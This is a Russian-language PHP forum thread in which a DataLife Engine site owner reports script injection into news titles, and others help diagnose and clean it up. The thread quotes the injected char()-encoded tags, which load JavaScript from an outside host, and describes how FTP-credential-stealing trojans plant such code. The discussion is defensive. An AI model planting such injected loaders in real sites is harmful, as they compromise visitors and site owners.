Модераторы: skyboy, MoLeX, Aliance, ksnk

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Проблемма! datalife engine 
:(
    Опции темы
olegarh
Дата 10.12.2011, 19:49 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 50
Регистрация: 6.2.2010

Репутация: нет
Всего: нет



Всем привет! Очень нужна ваща помощь
имеется сайт на datalife engine! вчера произошло что-то непонятное smile 
в загаловках всех новостей добавленных через движок появились вот такие javascrtiptы, какая то магия smile 
Код

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,117,120,105,46,49,100,117,109,98,46,99,111,109,47)363198b69625210b2277c3b547df1277.js" type="text/javascript"></script>
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,117,120,105,46,49,100,117,109,98,46,99,111,109,47)0c3c26eb7c37f4cd6b5673f320dd41c7.js" type="text/javascript"></script>
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,117,120,105,46,49,100,117,109,98,46,99,111,109,47)8b0689825d7592e27f3e8c3ceb8d75f8.js" type="text/javascript"></script>

и везде одно и тоже
увидеть можно это здесь и здесь и так далее во всех разделах

я понятия не имею почему так произошло, из-за чего это могло случиться??

вчера я долго исправлял все статьи и все вернулось на свои места, но сейчас эти скрипты снова появились! помогите пожалуйста и извините если не в той теме написал!

Добавлено через 4 минуты и 15 секунд
вбил в гугле и получил еще несколько сайтов с такой же проблеммой

 smile 


Это сообщение отредактировал(а) olegarh - 10.12.2011, 19:50
PM MAIL   Вверх
WolfAlone
Дата 10.12.2011, 20:56 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


В экстазе
***


Профиль
Группа: Завсегдатай
Сообщений: 1010
Регистрация: 16.9.2008
Где: Рай

Репутация: 1
Всего: 5



Не могу сказать точно, но очень похоже на вирус, который не так давно поразил Joomla и некоторые другие CMS. У Вас есть на компьютере сохраннённые пароли для FTP на котором лежит сайт?

P.S. Обычно, пароли могут быть сохранены в программах: FileZilla, Total commander и некоторых других.


--------------------
И сказал Бог: "Тогда я построю свой мир с блэк-джеком и шлюхами!"

Ф топку Ubuntu, Debian наше фсё!

(с) Евгений Вольф
PM MAIL WWW ICQ Skype   Вверх
olegarh
Дата 10.12.2011, 20:57 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 50
Регистрация: 6.2.2010

Репутация: нет
Всего: нет



да в filezilla сохранял((
 
спасибо за ответ
и как вообще с ним бороться?
PM MAIL   Вверх
WolfAlone
Дата 10.12.2011, 21:04 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


В экстазе
***


Профиль
Группа: Завсегдатай
Сообщений: 1010
Регистрация: 16.9.2008
Где: Рай

Репутация: 1
Всего: 5



Ээммм... Надо подумать. Вообще, не плохо бы скачать, я думаю, исходник сайта для начала и сделать поиск соответствующего текста в исходных файлах. Затем, удалить его оттуда и закачать всё обратно.

Перед этим, разумеется, лучше всего сделать бэкап сайта, полный.

Но, прежде всего, я думаю, стоит сделать вот что:
1. Изменить пароль к FTP
2. Не сохранять его больше в FileZilla

и/или... позаботиться о безопасности своей ОС на более высоком уровне.

P.S. Если у Вас затруднения с поиском по исходникам - можете кинуть код мне, я поищу/вырежу...


--------------------
И сказал Бог: "Тогда я построю свой мир с блэк-джеком и шлюхами!"

Ф топку Ubuntu, Debian наше фсё!

(с) Евгений Вольф
PM MAIL WWW ICQ Skype   Вверх
olegarh
Дата 10.12.2011, 21:06 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 50
Регистрация: 6.2.2010

Репутация: нет
Всего: нет



а что именно надо искать? 
просто сам код который в топике он находится в заголовках новостей
а сам вирус?
PM MAIL   Вверх
WolfAlone
Дата 10.12.2011, 21:11 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


В экстазе
***


Профиль
Группа: Завсегдатай
Сообщений: 1010
Регистрация: 16.9.2008
Где: Рай

Репутация: 1
Всего: 5



"вирус" этот (если это он) - лезет в исходный код и меняет его. По идее, он должен это делать не заметно... Но, он почему-то промахнулся, на этот раз.

Я думаю, стоит поискать что-то типа вот этого:
Код

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,117,120,105,46,49,100,117,109,98,46,99,111,109,47)



--------------------
И сказал Бог: "Тогда я построю свой мир с блэк-джеком и шлюхами!"

Ф топку Ubuntu, Debian наше фсё!

(с) Евгений Вольф
PM MAIL WWW ICQ Skype   Вверх
olegarh
Дата 10.12.2011, 21:17 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 50
Регистрация: 6.2.2010

Репутация: нет
Всего: нет



спасибо))
буду пробовать smile 
PM MAIL   Вверх
WolfAlone
Дата 10.12.2011, 21:24 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


В экстазе
***


Профиль
Группа: Завсегдатай
Сообщений: 1010
Регистрация: 16.9.2008
Где: Рай

Репутация: 1
Всего: 5



Потом расскажите о результатах, может ещё кому пригодится...


--------------------
И сказал Бог: "Тогда я построю свой мир с блэк-джеком и шлюхами!"

Ф топку Ubuntu, Debian наше фсё!

(с) Евгений Вольф
PM MAIL WWW ICQ Skype   Вверх
olegarh
Дата 10.12.2011, 21:25 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 50
Регистрация: 6.2.2010

Репутация: нет
Всего: нет



да! обязательно)
PM MAIL   Вверх
Suvoroff
Дата 10.12.2011, 22:09 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 3
Регистрация: 10.3.2007

Репутация: нет
Всего: нет



Также попробуйте использовать функцию "Антивирус" в самом движке, возможно найдутся лишние файлы с вирусом.
PM MAIL   Вверх
WolfAlone
Дата 10.12.2011, 22:47 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


В экстазе
***


Профиль
Группа: Завсегдатай
Сообщений: 1010
Регистрация: 16.9.2008
Где: Рай

Репутация: 1
Всего: 5



Suvoroff, никогда бы не подумал, что в движке может быть встроен "Антивирус"!

Если он работает по принципу "лишние файл", то, вряд ли там что-то найдётся. Этот "вирус" обычно ничего не добавляет, он лишь модифицирует имеющиеся файлы. При этом, происходит это примерно так:

1. Троян ворует сохраннённые от ФТП пароли
2. Специальная программа-робот (что-то типа "паук"а) поочерёдно подключается к ФТП и тащит оттуда файлы сайта.
3. После чего, пытается определить, какой движок используется на сайте
4. Если движок определён, в некоторые файлы, в автоматическом режиме внедряется посторонний код
5. "Зараженные" файлы закачиваются обратно на сервер

Могу сказать "наверняка", как должен был сработать код приведённый выше (автором темы):
1. Функция "CHAR" декодирует номера (коды) символов в буквы, получается URL
2. По получившемуся URL загружается некий JS-код, который что-то делает. Например, пытается своровать "куку"
3. Ну и т.д.

В общем, по какой-то причине произошёл сбой, благодаря которому, автор темы увидел этот "глюк" и поднял тревогу. Если бы всё сработало как надо, думаю, владелец сайта не скоро бы заметил "подмену"... А проблем такие скрипты могут принести много.

P.S. Не сохраняйте пароли к ФТП!!!


--------------------
И сказал Бог: "Тогда я построю свой мир с блэк-джеком и шлюхами!"

Ф топку Ubuntu, Debian наше фсё!

(с) Евгений Вольф
PM MAIL WWW ICQ Skype   Вверх
olegarh
Дата 12.12.2011, 03:00 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 50
Регистрация: 6.2.2010

Репутация: нет
Всего: нет



В общем проблему решил радикально  smile 
давно хотел сменить хостинг и сейчас самый подходящий момент был
на новый хостинг поставил последний dle
Залил туда базу данных со старого хостинга
Вот)))

но появился ряд проблем:
1. bbcode [thumb=left|текст для alt] - картинке правильно присваивается alt  но справа появляется тот же самый "текст для alt"? посмотреть можно здесь 
2. здесь появились 
Код

<!--TBegin_p-->
<!--TEnd_p-->

и картинки стали открываться по ссылке т.е если нажать не работает загрузка картинки и увеличение как это делается обычно а именно переход по ссылке картинки

помогите пожалуйста)
PM MAIL   Вверх
Ripper
Дата 12.12.2011, 07:04 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Lonely soul...
**


Профиль
Группа: Участник
Сообщений: 920
Регистрация: 30.6.2004
Где: г. Москва

Репутация: 1
Всего: 23



WolfAlone, вопрос немного не по теме - а где ты хранишь все пароли? Вот у меня есть доступ где-то к 10 сайтам, пароли в файлзилле. Да это не хорошо, но не на бумаге же все хранить и каждый раз вбивать?) Да даже из нотепада копировать надоест, хотя и там и вообще в любом месте на компе хранить не хорошо. Но только я не пойму как люди справляются с большим кол-вом паролей в разные панели, хостинги итп. Посоветуешь что-нибудь?


--------------------
"Он знает: надо смеяться над тем, что тебя мучит, иначе не сохранишь равновесия, иначе мир сведет тебя с ума" - Над кукушкиным гнездом
PM MAIL ICQ   Вверх
WolfAlone
Дата 12.12.2011, 17:58 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


В экстазе
***


Профиль
Группа: Завсегдатай
Сообщений: 1010
Регистрация: 16.9.2008
Где: Рай

Репутация: 1
Всего: 5



Ripper, надо обмозговать немного этот вопрос, так вот с ходу ничего умного не посоветую, ну разве что использовать FireWall толковый (это если Windows) и внимательно смотреть "кто" (какая программа) и куда пытается подключиться и/или что-то слить... Для *nix, я думаю этот вопрос можно решить на уровне прав доступа (хотя, возможно для Windows тоже можно с правами попробовать "поиграться", я честно говоря по винде не специалист, по этому тут сказать не могу).

Цитата(Ripper @  12.12.2011,  07:04 Найти цитируемый пост)
а где ты хранишь все пароли

Пароли от ФТП я честно говоря не храню вообще нигде. Я подключаюсь к серверу по ключу (без пароля). А пароль для ключа (ключей), в случае надобности - храню в голове. Если говорить совсем точно, то я вообще редко пользуюсь FTP, в основном я пользуюсь SFTP. Для этих целей есть не менее замечательная чем FileZilla программа и называется она WinSCP. Умеет авторизоваться по ключу.

Касательно большого количества панелей и пр. ... Если честно, затрудняюсь сказать, как люди справляются. Видимо, справляются не все. Пример тому мы уже видели. Конкретно в моём случае, такая проблема возникает редко, так как моя основная панель управления для всех серверов это либо "Терминал Gnome" либо "Putty", который опять таки, поддерживает ключи (при необходимости).

Для хранения паролей от сайтов, есть специальные программы, которые автоматически заполняют формы (в т.ч. и формы с паролями) на сайтах, а сами пароли хранят в зашифрованном виде, в каком-то своём безопасном хранилище. Что-то конкретно тут посоветовать не могу, т.к. если честно не пользуюсь ничем подобным.

Сказать по правде, для меня уже много лет остаётся загадкой, как вообще люди хватают всякие вирусы, теряют пароли от соц. сетей, эл. почты, платёжных систем и так далее.  Лет где-то так 15 за компьютером работаю, и вот ни разу не хватал ни порно-баннеры, ни ещё дрянь какую. Ключи не терял, страницу в соц. сетях мою не взламывали, электронную почту тоже... (тьфу-тьфу-тьфу  smile )

При этом, ни разу не видел, что бы сохраненные например в FireFox пароли стали достоянием какого-нибудь "злостного хакера". Может быть, FireFox тоже их шифрует?

olegarh, касательно:
Код

<!--TBegin_p-->
<!--TEnd_p-->

Я если честно DLE в глаза видел всего несколько раз (не понравился он мне), но, подозреваю, что это какой-то мета-тег в виде комментария для самой DLE. Происходит так, я думаю по тому, что эти самые теги где-то указанны, и при этом какой-то фильтр DLE делает из "<" и ">" соответствующие HTML-символы (проще говоря, фильтрует HTML). Предполагаю, что избавиться от этого можно путём поиска соответствующего кода в исходниках (скорее всего, где-то в шаблоне) и удалением "этого" оттуда.

На счёт "alt справа" сказать ничего к сожалению не могу. Хотя, подозреваю, что стоило перенести не просто старую базу на новый код, а провести некую процедуру "Импорт/Экспорт", тогда бы, я думаю, таких проблем не возникло.


--------------------
И сказал Бог: "Тогда я построю свой мир с блэк-джеком и шлюхами!"

Ф топку Ubuntu, Debian наше фсё!

(с) Евгений Вольф
PM MAIL WWW ICQ Skype   Вверх
olegarh
Дата 12.12.2011, 18:11 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 50
Регистрация: 6.2.2010

Репутация: нет
Всего: нет



Да dle тоже мне ужасно не нравится, но мне отстается только подстраиваться потому что переносить на другой движок еще большая морока!

насчет переноса все получилось грамотно! Оказывается этот баг был еще до переноса и появился вместе с вирусом! Видимо он там что то напортачил!
Просто знать бы какие файлы за это отвечают)) и где подправить
PM MAIL   Вверх
WolfAlone
Дата 12.12.2011, 18:18 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


В экстазе
***


Профиль
Группа: Завсегдатай
Сообщений: 1010
Регистрация: 16.9.2008
Где: Рай

Репутация: 1
Всего: 5



olegarh, обычно я борюсь с эти так:

1. NetBeans 7.x
2. Создать проект с существующим исходным кодом
3. Правой кнопкой на корневой директории с проектом (в NetBeans)
4. Пункт меню "Поиск..."
5. Вводим текст, который хотим найти
6. Смотрим список файлов, с найденным текстом
7. Открываем файлы и вносим соответствующие корректировки.

Если после переноса базы (учитывая то, что исходный код DLE "чист"), появилась такая ерунда - видимо, этот "вирус" ещё и в базе нагадил. В этом случае, следует сделать поиск подобного текста по БД.


--------------------
И сказал Бог: "Тогда я построю свой мир с блэк-джеком и шлюхами!"

Ф топку Ubuntu, Debian наше фсё!

(с) Евгений Вольф
PM MAIL WWW ICQ Skype   Вверх
Страницы: (2) [Все] 1 2 
Ответ в темуСоздание новой темы Создание опроса
Правила форума "PHP"
Aliance
IZ@TOP
skyboy
SamDark
MoLeX

Новичкам:

  • PHP редакторы собираются и обсуждаются здесь
  • Электронные книги по PHP, документацию можно найти здесь
  • Интерпретатор PHP, полную документацию можно скачать на PHP.NET

Важно:

  • Не брезгуйте пользоваться тегами [code=php]КОД[/code] для повышения читабельности текста/кода.
  • Перед созданием новой темы воспользуйтесь поиском и загляните в FAQ
  • Действия модераторов можно обсудить здесь

Внимание:

  • Темы "ищу скрипт", "подскажите скрипт" и т.п. будут переноситься в форум "Web-технологии"
  • Темы с именами: "Срочно", "помогите", "не знаю как делать" будут УДАЛЯТЬСЯ

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers.

 
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | PHP: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.1023 ]   [ Использовано запросов: 21 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.